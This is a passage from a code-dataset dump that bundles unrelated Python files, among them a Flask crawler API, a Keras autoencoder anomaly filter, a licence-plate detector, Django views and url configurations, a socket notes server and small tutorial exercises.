limit=20))\n\n\n@blueprint.route('/api/1/crawlers', methods=['POST', 'PUT'])\ndef queue():\n authz.require(authz.is_admin())\n data = request_data()\n crawler_id = data.get('crawler_id')\n for cls in get_exposed_crawlers():\n if crawler_id == cls.get_id():\n incremental = bool(data.get('incremental', False))\n execute_crawler.delay(crawler_id, incremental=incremental)\n return jsonify({'status': 'queued'})\n return jsonify({'status': 'error', 'message': 'No such crawler'},\n status=400)\n\n\n@blueprint.route('/api/1/collections//crawlerstates',\n methods=['GET'])\ndef collection_crawlerstates(id):\n authz.require(authz.collection_write(id))\n q = db.session.query(CrawlerState)\n q = q.filter(CrawlerState.collection_id == id)\n q = q.filter(or_(\n CrawlerState.error_type != 'init',\n CrawlerState.error_type == None # noqa\n ))\n\n status = request.args.get('status')\n if status:\n q = q.filter(CrawlerState.status == status)\n\n crawler_id = request.args.get('crawler_id')\n if crawler_id:\n q = q.filter(CrawlerState.crawler_id == crawler_id)\n\n crawler_run = request.args.get('crawler_run')\n if crawler_run:\n q = q.filter(CrawlerState.crawler_run == crawler_run)\n\n q = q.order_by(CrawlerState.created_at.desc())\n return jsonify(Pager(q, id=id))\n","sub_path":"aleph/views/crawlers_api.py","file_name":"crawlers_api.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"170958732","text":"import keras\nfrom utils import data_loader, data_preprocess\nimport numpy as np\n\nauto_encoder_model_filename = \"fixed_models/autoencoder.h5\"\n\n\nclass AutoEncoder:\n def __init__(self):\n self.auto_encoder = keras.models.load_model(auto_encoder_model_filename)\n self.auto_encoder.compile(optimizer='adam', loss='mean_squared_error')\n self.threshold = 0.09179428238229165\n\n def reset_threshold(self, retrained_data_filename):\n retrained_x, retrained_y = data_loader(retrained_data_filename)\n retrained_x = data_preprocess(retrained_x)\n reconstructions = self.auto_encoder.predict(retrained_x)\n train_loss = keras.losses.mae(reconstructions, retrained_x)\n self.threshold = np.mean(train_loss) + np.std(train_loss) + 0.03\n\n def encoder_predict(self, input_x):\n '''\n Generate mask for detecting the abnomal input. Once the constrcture loss over the threhold,\n we treat it as abnormal input\n\n Args:\n autoencoder(Model): autoencoder model\n input_x (array size with [None,55,47,3]): Input data\n threshold (float): used to detect abnomal input\n\n Retrun:\n res: A mask like [0,1,0,1....] in numpy.array type. 0 is abnormal point, and 1 is validated point\n\n '''\n reconstruction = self.auto_encoder.predict(input_x)\n detect_loss = keras.losses.mae(reconstruction, input_x)\n res = np.fromiter(map(lambda x: 1 if (np.mean(x) + np.std(x)) <= self.threshold else 0, detect_loss), dtype=int)\n return res\n\n\nclass AutoEncoderRepairedModel:\n\n def __init__(self, autoencoder, repaired_model):\n self.AE = autoencoder\n self.repaired_model = repaired_model\n\n def predict(self, x):\n mask = self.AE.encoder_predict(x)\n y_hat = np.argmax(self.repaired_model.predict(x), axis=1)\n y_hat[mask == 0] = 1283\n return y_hat\n\n\n'''\ndef final_predict(autoencoder, repaired_model, x):\n mask = autoencoder.encoder_predict(x)\n y_hat = np.argmax(repaired_model.predict(x), axis=1)\n y_hat[mask == 0] = 1283\n return y_hat\n\n\nif __name__ == '__main__':\n\n AE = AutoEncoder()\n repaired_model = keras.models.load_model(\"fixed_models/pruning.h5\")\n retrained_x, retrained_y = data_loader(retrained_data_filename)\n retrained_x = data_preprocess(retrained_x)\n retrained_y_hat = final_predict(AE,repaired_model,retrained_x)\n print(np.mean(np.equal(retrained_y_hat, retrained_y)) * 100)\n\n'''\n","sub_path":"auto_encoder_utils.py","file_name":"auto_encoder_utils.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"558379859","text":"# Copyright (c) 2016 Matthew Earl\n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included\n# in all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\n# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN\n# NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,\n# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR\n# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE\n# USE OR OTHER DEALINGS IN THE SOFTWARE.\n\n\n\"\"\"\nRoutines to detect number plates.\n\nUse `detect` to detect all bounding boxes, and use `post_process` on the output\nof `detect` to filter using non-maximum suppression.\n\npython3 ../detect_oneImage.py orig1-plateOnly-glb-172.jpg /home/mka/PycharmProjects/deep-anpr-x64-y32-finplate/weights3.npz\n\npython3 ../detect_oneImage.py orig1-plateOnly-glb-172.jpg /home/mka/PycharmProjects/deep-anpr-x64-y32/weights.npz\n\n\n\n\"\"\"\n\nimport collections\nimport itertools\nimport math\nimport sys\n\nimport cv2\nimport numpy as np\nimport tensorflow as tf\n\nimport Image2Characters.model\n\nfrom scipy.optimize import minimize, fmin_l_bfgs_b, fmin_powell, \\\n basinhopping, differential_evolution, brute\n\nfrom matplotlib import pyplot as plt\n\n__all__ = (\n 'DIGITS',\n 'LETTERS',\n 'CHARS',\n 'sigmoid',\n 'softmax',\n )\n\nimport numpy\n\n\nDIGITS = \"0123456789\"\nLETTERS = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\nCHARS = LETTERS + DIGITS + '-'\n\ndef softmax(a):\n exps = numpy.exp(a.astype(numpy.float64))\n return exps / numpy.sum(exps, axis=-1)[:, numpy.newaxis]\n\ndef sigmoid(a):\n return 1. / (1. + numpy.exp(-a))\n \n\nclass RandomDisplacementBounds(object):\n \"\"\"random displacement with bounds\"\"\"\n def __init__(self, xmin, xmax, stepsize=0.05):\n self.xmin = xmin\n self.xmax = xmax\n self.stepsize = stepsize\n\n def __call__(self, x):\n \"\"\"take a random step but ensure the new position is within the bounds\"\"\"\n while True:\n # this could be done in a much more clever way, but it will work for example purposes\n xnew = x + np.random.uniform(-self.stepsize, self.stepsize, np.shape(x))\n if np.all(xnew < self.xmax) and np.all(xnew > self.xmin):\n break\n return xnew\n\nclass Detect():\n \"\"\" maximaze the probability of a plate as seen by the trained neural network\n we search the best window in the image\n (upperleft x and y, and width and height in the image)\n give the letters of the plate for this subimage \"\"\"\n\n\n def __init__(self, image=None, param_vals=None):\n self.image = image # image containing the number plate\n self.param_vals = param_vals # neural network optimal values from train.py\n self.uly = 10 # upper left y of the portion\n self.ulx = 10 # upper left x of the portion\n self.lry = image.shape[0]-10 # width of the portion\n self.lrx = image.shape[1]-10 # heigth of the portion\n self.prob = None # final probability\n self.best_letters = None # final characters of the plage\n self.scale=1e-8 # trick to get scipy minimize work for integer function\n self.best = 1.0\n self.best_rectangle = None\n\n def setNpImage(self,image):\n self.image=image\n \n def get_best(self):\n return self.best, self.best_letters\n\n def get_best_rectangle(self):\n return self.best_rectangle\n\n def make_scaled_im(self, clone):\n return cv2.resize(clone, (model.WINDOW_SHAPE[1], model.WINDOW_SHAPE[0]))\n\n\n def maximise_prob(self):\n \"\"\" by scipy cg, find the portion of the image that gives max probability of a plate\"\"\"\n x0 = np.asarray([0.1,0.1,0.9,0.9])\n #direc=np.asarray([100,100,-100,-100])\n bnds = ((0.0, 1.0), (0.0, 1.0),\n (0.0, 1.0), (0.0, 1.0))\n\n rranges = (slice(0, self.image.shape[0], 10),\n slice(0, self.image.shape[1], 10),\n slice(0, self.image.shape[0], 10),\n slice(0, self.image.shape[1], 10))\n print(bnds)\n print(\"x0\",x0)\n res = brute(self.detect, rranges)\n # res = differential_evolution(func=self.detect, bounds=bnds, strategy='best1exp', popsize=5, mutation=1.99)\n #res = minimize(self.detect, x0, method='SLSQP', bounds=bnds, options = {'eps': 0.5})\n #BASIN define the new step taking routine and pass it to basinhopping\n #BASIN take_step = RandomDisplacementBounds(0, 1)\n #BASIN minimizer_kwargs = dict(method=\"SLSQP\", bounds=bnds, options={'maxiter':1})\n #BASIN res = basinhopping(self.detect, x0, T=0.001, minimizer_kwargs=minimizer_kwargs,take_step=take_step)\n #res = minimize(self.detect, x0, method='SLSQP')\n #xx,yy,zz = fmin_powell(self.detect, x0, direc=direc)\n #xval,fval,other = fmin_l_bfgs_b(func=self.detect, x0=x0, approx_grad=True, bounds=bnds)\n #xval,fval,other = fmin_l_bfgs_b(func=g, x0=x0, approx_grad=True)\n\n print(\"result1\", res)\n\n def letter_probs_to_code(self, letter_probs):\n return \"\".join(CHARS[i] for i in np.argmax(letter_probs, axis=1))\n\n def g2(self, x):\n res = x[0] + x[1] - x[2] - x[3]\n return res\n\n def get_prob_and_letters(self, image):\n \"\"\" for a single image, get a probability that a plate of roughly right size is there,\n get also characters of the plate \"\"\"\n\n xx, yy, params = model.get_detect_model()\n\n #plt.imshow(scaled_im)\n #plt.xticks([]), plt.yticks([]) # to hide tick values on X and Y axis\n #plt.show()\n\n present_prob=0.0\n xx, yy, params = model.get_detect_model()\n # Execute the model at each scale.\n with tf.Session(config=tf.ConfigProto()) as sess:\n y_vals = []\n feed_dict = {xx: np.stack([image])}\n feed_dict.update(dict(zip(params, self.param_vals)))\n y_vals.append(sess.run(yy, feed_dict=feed_dict))\n\n # Interpret the results in terms of bounding boxes in the input image.\n # Do this by identifying windows (at all scales)\n # where the model predicts a\n # number plate has a greater than 50% probability of appearing.\n #\n # To obtain pixel coordinates,\n # the window coordinates are scaled according\n # to the stride size, and pixel coordinates.\n i=0; y_val = y_vals[0]\n for window_coords in np.argwhere(y_val[0, :, :, 0] > -math.log(1./0.001 - 1)):\n letter_probs = (y_val[0,\n window_coords[0],\n window_coords[1], 1:].reshape(\n 7, len(CHARS)))\n letter_probs = softmax(letter_probs)\n\n img_scale = float(1)\n\n present_prob = sigmoid(\n y_val[0, window_coords[0], window_coords[1], 0])\n\n print(present_prob, self.letter_probs_to_code(letter_probs))\n if present_prob > 0.0:\n letters = self.letter_probs_to_code(letter_probs)\n else:\n letters = None\n\n return present_prob, letters\n\n def get_all_prob_letters(self, nstepBigger=16, nstepSmaller=6, stepPix=4):\n \"\"\" scale image and get corresponding probability of existence a proper plate and get also plate characters\"\"\"\n images = []\n probs = []\n letters = []\n # start from small\n width = self.image.shape[1]-nstepSmaller * stepPix\n height = self.image.shape[0]-nstepSmaller * stepPix\n ulx = width/2\n uly = height/2\n for istep in range(nstepBigger + nstepSmaller):\n # take slice\n scaled_im = self.image.copy()[uly:(uly+height), ulx:(ulx+width)]\n scaled_im = cv2.resize(scaled_im, (model.WINDOW_SHAPE[1], model.WINDOW_SHAPE[0]))\n present_prob, letters = self.get_prob_and_letters(scaled_im)\n probs.append(present_prob)\n letters.append(letters)\n images.append(image)\n\n plt.plot(probs)\n plt.title(\"Probs\")\n plt.show()\n\n\n def detect(self, x):\n \"\"\"\n Detect number plates in an image.\n :param x\n area in image xtopleft, ytopleft, width, height\n\n \"\"\"\n\n xarea = x.copy()\n #xarea[0] = x[0]*self.image.shape[0]\n #xarea[2] = x[2]*self.image.shape[0]\n #xarea[1] = x[1]*self.image.shape[1]\n #xarea[3] = x[3]*self.image.shape[1]\n #xarea = xarea.astype(int)\n\n\n #small_image = self.image.copy()[xarea[1]:(xarea[1]+xarea[3]),\n # xarea[0]:(xarea[0] + xarea[2])]\n # Convert the image to various scales.\n #scaled_im = self.make_scaled_im(small_image.copy())\n scaled_im = self.make_scaled_im(self.image.copy())\n\n # Load the model which detects number plates over a sliding window.\n xx, yy, params = model.get_detect_model()\n\n plt.imshow(scaled_im)\n plt.xticks([]), plt.yticks([]) # to hide tick values on X and Y axis\n plt.show()\n\n present_prob=0.0\n\n # Execute the model at each scale.\n with tf.Session(config=tf.ConfigProto()) as sess:\n y_vals = []\n feed_dict = {xx: np.stack([scaled_im])}\n feed_dict.update(dict(zip(params, self.param_vals)))\n y_vals.append(sess.run(yy, feed_dict=feed_dict))\n\n # Interpret the results in terms of bounding boxes in the input image.\n # Do this by identifying windows (at all scales)\n # where the model predicts a\n # number plate has a greater than 50% probability of appearing.\n #\n # To obtain pixel coordinates,\n # the window coordinates are scaled according\n # to the stride size, and pixel coordinates.\n i=0; y_val = y_vals[0]\n for window_coords in np.argwhere(y_val[0, :, :, 0] > -math.log(1./0.001 - 1)):\n letter_probs = (y_val[0,\n window_coords[0],\n window_coords[1], 1:].reshape(\n 7, len(CHARS)))\n letter_probs = softmax(letter_probs)\n\n img_scale = float(1)\n\n present_prob = sigmoid(\n y_val[0, window_coords[0], window_coords[1], 0])\n\n print(present_prob, self.letter_probs_to_code(letter_probs))\n if present_prob > 0.0:\n letters = self.letter_probs_to_code(letter_probs)\n else:\n letters = None\n result = 1.0-present_prob\n if result < self.best:\n self.best = 1.0-present_prob\n self.best_letters = letters\n self.best_rectangle = xarea\n print(\"returning\",result)\n return result\n\n\nif __name__ == \"__main__\":\n im_gray = cv2.imread(sys.argv[1])[:, :, 0].astype(numpy.float32) / 255.\n #im = cv2.imread(sys.argv[1])\n #try:\n # im_gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n #except:\n # im_gray = im \n\n f = np.load(sys.argv[2])\n param_vals = [f[n] for n in sorted(f.files, key=lambda s: int(s[4:]))]\n print(im_gray.shape)\n #plt.imshow(im_gray)\n #plt.xticks([]), plt.yticks([]) # to hide tick values on X and Y axis\n #plt.show()\n app = Detect(image=im_gray, param_vals = param_vals)\n #app.maximise_prob()\n #detect(im_gray[27:120,140:480], param_vals)\n app.detect(im_gray)\n\n\n","sub_path":"detect_oneImage.py","file_name":"detect_oneImage.py","file_ext":"py","file_size_in_byte":12194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"571704356","text":"# When we awesome programmers write our code many things could go wrong,\n# our programs can encounter a lot of different exceptions. It is our duty to handle this of course.\n\n# Lets create an example that crashes our application:\n\nnumbers = [1, 2]\n\n# BAD PROGRAMMING:\n\n# print(numbers[3]) # Uncomment to see the world burn :D\n\n# Okay the above code should not slip in to production code, because it would be bad code!\n# But what to do with the unexpected, like user input for example?\n\n# Hopefully our user knows what to do; and which data we need\n\n# \"said no one ever...\"\n\n# For these kind of situations we have the try-except block:\n\ntry:\n age = int(input('Please fill in your age: ')) # Remember the input function always returns a string!\nexcept ValueError:\n print('You did not enter a valid age!')\nelse:\n print('Executed if and only if there was no exception thrown') # Test it when in doubt :D\n\nprint('Executions continues whatever happens') # Because we took care of a possible exception we're sure to arrive here whatever happens\n\n# Here is an overview of the Python exception hierarchy:\n# More info can be found here: https://docs.python.org/3/library/exceptions.html\n\n# TL;DR\n\n\"\"\"\nBaseException0.\n +-- SystemExit\n \n +-- KeyboardInterrupt\n +-- GeneratorExit\n +-- Exception\n +-- StopIteration\n +-- StopAsyncIteration\n +-- ArithmeticError\n | +-- FloatingPointError\n | +-- OverflowError\n | +-- ZeroDivisionError\n +-- AssertionError\n +-- AttributeError\n +-- BufferError\n +-- EOFError\n +-- ImportError\n | +-- ModuleNotFoundError\n +-- LookupError\n | +-- IndexError\n | +-- KeyError\n +-- MemoryError\n +-- NameError\n | +-- UnboundLocalError\n +-- OSError\n | +-- BlockingIOError\n | +-- ChildProcessError\n | +-- ConnectionError\n | | +-- BrokenPipeError\n | | +-- ConnectionAbortedError\n | | +-- ConnectionRefusedError\n | | +-- ConnectionResetError\n | +-- FileExistsError\n | +-- FileNotFoundError\n | +-- InterruptedError\n | +-- IsADirectoryError\n | +-- NotADirectoryError\n | +-- PermissionError\n | +-- ProcessLookupError\n | +-- TimeoutError\n +-- ReferenceError\n +-- RuntimeError\n | +-- NotImplementedError\n | +-- RecursionError\n +-- SyntaxError\n | +-- IndentationError\n | +-- TabError\n +-- SystemError\n +-- TypeError\n +-- ValueError\n | +-- UnicodeError\n | +-- UnicodeDecodeError\n | +-- UnicodeEncodeError\n | +-- UnicodeTranslateError\n +-- Warning\n +-- DeprecationWarning\n +-- PendingDeprecationWarning\n +-- RuntimeWarning\n +-- SyntaxWarning\n +-- UserWarning\n +-- FutureWarning\n +-- ImportWarning\n +-- UnicodeWarning\n +-- BytesWarning\n +-- ResourceWarning\n\"\"\"\n","sub_path":"3-exceptions/1-basics/GeneralExceptions.py","file_name":"GeneralExceptions.py","file_ext":"py","file_size_in_byte":3074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"229855897","text":"__author__ = 'Administrator'\nfrom django.conf.urls import patterns, url\nfrom user import views\n\nurlpatterns = patterns('',\n url(r'^register/$', views.register, name='register'),\n url(r'^login/$', views.login, name='login'),\n url(r'^getUserInfo/$', views.get_user_info, name='getUserInfo'),\n # url(r'register1/$', views.signup, name='hello'),\n # url(r'hello/test/$', views.test, name='test'),\n)\n","sub_path":"user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"621531846","text":"import numpy as np\n\n# Our image processing tools\nimport skimage.filters\nimport skimage.io\nimport skimage.measure\nimport skimage.morphology\nimport skimage.segmentation\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Set matplotlib rc params.\nrc = {'lines.linewidth' : 2, 'axes.labelsize' : 18,\n 'axes.titlesize' : 18}\nsns.set(rc=rc)\nsns.set_style('dark')\n\n# Load the images\nphase_im = skimage.io.imread('data/HG105_images/noLac_phase_0004.tif')\nfl_im = skimage.io.imread('data/HG105_images/noLac_FITC_0004.tif')\n\n\nplt.imshow(phase_im, cmap=plt.cm.viridis)\nplt.close()\n\n# Apply a gaussian blur to the image\nim_blur = skimage.filters.gaussian(phase_im, 50.0) # radius = 50\n\n# Show the blurred image\nplt.imshow(im_blur, cmap=plt.cm.viridis)\nplt.close()\n\n# Convert phase image to a float\nphase_float = skimage.img_as_float(phase_im) # rescaling between zero and one\nphase_sub = phase_float - im_blur\n\nplt.figure()\nplt.imshow(phase_float, cmap=plt.cm.viridis)\nplt.title('original')\n\nplt.figure()\nplt.imshow(phase_sub, cmap=plt.cm.viridis)\nplt.title('subtracted')\n\nplt.close()\n\n# Appy otsu thresholding\nthresh = skimage.filters.threshold_otsu(phase_sub)\nseg = phase_sub < thresh\n\nplt.imshow(seg, cmap=plt.cm.Greys_r)\nplt.close()\n\n# Label each pixel 'island'\nseg_lab, num_cells = skimage.measure.label(seg, return_num=True, background=0)\nplt.imshow(seg_lab, cmap=plt.cm.Spectral_r)\nplt.close()\n\n# Compute the region properties and extract area of each object\nip_dist = 0.063 # µm per pixel\nprops = skimage.measure.regionprops(seg_lab)\n# props[0].area would give the pixel area of the first object\n\n# Get the areas as an array\nareas = np.array([prop.area for prop in props])\ncutoff = 300\n\nim_cells = np.copy(seg_lab) > 0\nfor i, _ in enumerate(areas):\n if areas[i] < cutoff:\n # Erase it from our image by setting all pixels = 0\n im_cells[seg_lab==props[i].label] = 0\n\narea_filt_lab = skimage.measure.label(im_cells)\n\nplt.figure()\nplt.imshow(area_filt_lab, cmap=plt.cm.Spectral_r)\n#plt.imshow(im_cells)\nplt.show()\n","sub_path":"image_processing_case_study.py","file_name":"image_processing_case_study.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"484672202","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n\nurlpatterns = [\n path('accounts/', include('django.contrib.auth.urls')),\n path('accounts/', include('accounts.urls')),\n\n path('admin/', admin.site.urls),\n path('', include('products.urls', namespace='products')),\n path('cart/', include('cart.urls', namespace='cart')),\n path('checkout/', include('checkout.urls', namespace='checkout')),\n path('contact/', include('contact.urls', namespace='contact')),\n path('acc/', include('allauth.urls')),\n]\n\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"ecommerce/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"547900417","text":"# -*- coding: utf-8 -*-\n\nfrom django import template\nfrom django.template import Node, NodeList, Template, Context, Variable\nfrom django.template import TemplateSyntaxError\nfrom django.utils.encoding import force_unicode\nfrom django.conf import settings\nimport os, re\n\nregister = template.Library()\n\n#######################################################################################################################\n#######################################################################################################################\n\n#Для администратора ставит ссылку на url\t\nclass FrontAdminNode(Node):\n\tdef __init__(self, url):\n\t\tself.url = url\n\t\t\n\tdef render(self, context):\n\t\trequest = context.get('request', None)\n\t\n\t\tif request and request.user and request.user.is_staff:\n\t\t\ttry:\n\t\t\t\turl = template.Variable(self.url).resolve(context)\n\t\t\texcept:\n\t\t\t\ttry:\n\t\t\t\t\turl = self.url[1:-1]\n\t\t\t\texcept:\n\t\t\t\t\treturn u''\n\t\t\treturn u'''\n\t\t\t\t
\n\t\t\t''' % url \n\t\telse:\n\t\t\treturn u''\n\ndef FrontAdmin(parser, token):\n\tbits = token.split_contents()\n\tif len(bits) != 2: raise TemplateSyntaxError('Error token tag \"FrontAdmin\"')\n\treturn FrontAdminNode(bits[1])\n\nregister.tag('FrontAdmin', FrontAdmin)\n\n#######################################################################################################################\n#######################################################################################################################","sub_path":"www/front_admin/templatetags/front_admin_tags.py","file_name":"front_admin_tags.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"577637769","text":"class Solution:\n # @return a string\n def convert(self, s, nRows):\n zigzag = [[] for i in xrange(nRows)]\n base = 2 * nRows - 2\n for i, c in enumerate(s):\n \tindex = i % base if base > 0 else 0\n \tif index >= nRows: index = nRows * 2 - index - 2\n \tzigzag[index].append(c)\n result = ''\n for row in zigzag:\n \tfor c in row:\n \t\tresult += c\n return result","sub_path":"leetcode_python/006_ZigZag_Conversion.py","file_name":"006_ZigZag_Conversion.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"486049281","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport socket\nimport json\nimport uuid\nimport time\n\n\nkeys = [\"id\", \"title\", \"text\", \"date_create\", \"date_update\"]\n\n\n# Данная фенкция формирует ответ клиенту в формате словаря с необходимыми ключами\ndef send_answer(uuid_note=\"\", title=\"\", text=\"\", date_create=0000000000, date_update=0000000000):\n send_data = {\"id\": uuid_note, \"title\": title, \"text\": text, \"date_create\": date_create, \"date_update\": date_update}\n tmp_data = json.dumps(send_data).encode()\n return tmp_data\n\n\n#Функция считывает из файла все заметки и возвращает список словарей\ndef get_notes():\n notes = []\n current_note = {}\n try:\n with open(\"notes.txt\", encoding='utf-8') as f:\n for note in f:\n note = note.strip().split(',')\n for n, item in enumerate(keys):\n current_note[item] = note[n]\n notes.append(current_note.copy())\n except:\n return notes\n\n\n#Функция записывает новую заметку в файл. В случае успеха возвращает True; если запись не выполнена - возвращает False\ndef save_note(new_note):\n tmp = []\n saved_note = []\n new_note[\"id\"] = str(uuid.uuid4())\n new_note[\"date_create\"] = int(time.time())\n new_note[\"date_update\"] = int(time.time())\n\n for key in new_note:\n tmp.append(str(new_note[key]))\n tmp = ','.join(tmp)\n\n try:\n with open(\"notes.txt\", \"a\", encoding='utf-8') as f:\n f.write(tmp + '\\n')\n print(\"Заметка успешно создана\")\n saved_note = tmp.strip().split(\",\")\n except:\n print(\"Ошибка записи\")\n finally:\n return saved_note\n\n\n#Функция принимает в качестве аргументов список словарей и id нужного словаря. Словарь с этим id удаляет из списка.\ndef del_note(selected_id):\n readed_notes = get_notes()\n deleted_note = []\n for ind, tmp_note in enumerate(readed_notes):\n if tmp_note[\"id\"] == selected_id:\n tmp_note = readed_notes.pop(ind)\n save_all(readed_notes)\n break\n for key in tmp_note.keys():\n deleted_note.append(tmp_note[key])\n return deleted_note\n\n\n#Функция принимает в качестве аргументов список словарей и отредактированный словарь. Заменяет в списке в искомом\n#словаре \"title\" и \"text\" на новые. При этом обновляется \"date_update\". Возвращается отредактированный список словарей.\ndef replace_note(new_note):\n replaced_note = []\n readed_notes = get_notes()\n for note in readed_notes:\n if new_note[\"id\"] == note[\"id\"]:\n note[\"title\"] = new_note[\"title\"]\n note[\"text\"] = new_note[\"text\"]\n note[\"date_update\"] = str(int(time.time()))\n replaced_note = note\n break\n save_all(readed_notes)\n return replaced_note\n\n\n#Принимает в качестве аргумента список словарей и записывает из в файл\ndef save_all(notes_to_save):\n with open(\"notes.txt\", \"w\", encoding=\"utf-8\") as f:\n for ind, note in enumerate(notes_to_save):\n tmp = []\n for key in note:\n tmp.append(note[key])\n f.write(','.join(tmp) + '\\n')\n\n\nsock = socket.socket()\nsock.bind(('localhost', 8080))\nsock.listen(1)\nconn, addr = sock.accept()\nprint(\"connected:\", addr)\n\nwhile True:\n data = conn.recv(1024)\n recieved_data = json.loads(data.decode(\"utf-8\"))\n\n #Добавить заметку\n if recieved_data[\"id\"] == \"\" and recieved_data[\"title\"] != \"\":\n note = save_note(recieved_data)\n conn.sendall(send_answer(*note))\n\n # Показать имеющиеся заметки\n elif recieved_data[\"id\"] == \"\" and recieved_data[\"title\"] == \"\":\n notes = get_notes()\n answer = json.dumps(notes).encode()\n conn.sendall(answer)\n\n # Удалить заметку\n elif recieved_data[\"id\"] != \"\" and recieved_data[\"title\"] == \"\":\n note = del_note(recieved_data[\"id\"])\n print(\"note\", note)\n conn.sendall(send_answer(*note))\n\n # Изменить заметку\n elif recieved_data[\"id\"] != \"\" and recieved_data[\"title\"] != \"\" and recieved_data[\"text\"] != \"\":\n note = replace_note(new_note=recieved_data)\n conn.sendall(send_answer(*note))\n","sub_path":"Server_test.py","file_name":"Server_test.py","file_ext":"py","file_size_in_byte":4768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"466769270","text":"#/usr/bin/env python\n\nimport unittest\nimport os\n\n\ndef cleanup(line):\n\n return line.strip().strip('\\n').split()\n\n\nclass TestSolution(unittest.TestCase):\n\n\n def test_cmg_output(self):\n\n with open('assignment14.out') as f:\n\n raw_content = f.readlines()\n\n\n for line in raw_content:\n clean_line = cleanup(line) \n\n if clean_line != []:\n if clean_line[0] == 'Current' and clean_line[1] == 'Fluids':\n assert abs(float(clean_line[6]) - float(71256)) < 5\n\n\nif __name__ == '__main__':\n unittest.main()\n\n\n\n\n\n\n\n\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"387501512","text":"def prime_number_of_divisors(n):\n sum = 0\n for x in range(1, n + 1):\n if n % x == 0:\n sum += 1\n if sum % 2 == 0 and sum > 2:\n return False\n for i in range(2, int(n ** 0.5) + 1):\n if n % i == 0:\n return False\n else:\n return True\n","sub_path":"week0/simpleAndHarderProblems/primeNumberDivisors.py","file_name":"primeNumberDivisors.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"43625194","text":"import difflib\nimport json\n\nimport pandas as pd\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.contrib.humanize.templatetags.humanize import naturaltime\nfrom django.http import HttpResponse\nfrom django.http import JsonResponse\nfrom django.http import QueryDict\nfrom django.shortcuts import render\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import sigmoid_kernel\nfrom sklearn.preprocessing import MinMaxScaler\n\nfrom accounts.models import Profile\nfrom book.models import Book\nfrom book.models import BookReview\nfrom book.utils import googleBooksAPIRequests\n\n\ndef mainpage(request):\n\tif request.method == \"POST\":\n\n\t\tbookSearchQuery = request.POST[\"booksearch\"]\n\t\trequestedBooks = googleBooksAPIRequests(bookSearchQuery)\n\n\t\tif len(requestedBooks) > 0:\n\t\t\tcontext = {\n\t\t\t\t\"bookResults\": requestedBooks,\n\t\t\t\t\"bookSearchQuery\": bookSearchQuery\n\t\t\t}\n\t\t\treturn render(request, \"book/mainpage.html\", context)\n\t\telse:\n\t\t\tcontext = {\n\t\t\t\t\"noResult\": \"Sorry, we could't find any results matching ' {} '\".format(bookSearchQuery)\n\t\t\t}\n\t\treturn render(request, \"book/mainpage.html\", context)\n\n\tcontext = {\n\t\t\"recentlyAddedBooks\": recentlyAddedBooks(),\n\t\t\"booksBasedOnRatings\": booksBasedOnRatings(),\n\t\t\"favouriteBooksFromSimilarUsers\": favouriteBooksFromSimilarUsers(request),\n\t}\n\t\n\treturn render(request, \"book/mainpage.html\", context)\n\ndef bookPage(request, isbn_13):\n\ttry:\n\t\tbook = Book.objects.get(isbn13=isbn_13)\n\texcept Book.DoesNotExist as e:\n\t\traise e\n\n\tif request.user.is_authenticated:\n\t\tif 'visitedBooks' not in request.session:\n\t\t\trequest.session['visitedBooks'] = []\n\n\t\tvisitedBooks = request.session['visitedBooks']\n\n\t\tif isbn_13 not in visitedBooks:\n\t\t\tvisitedBooks.append(isbn_13)\n\t\trequest.session['visitedBooks'] = 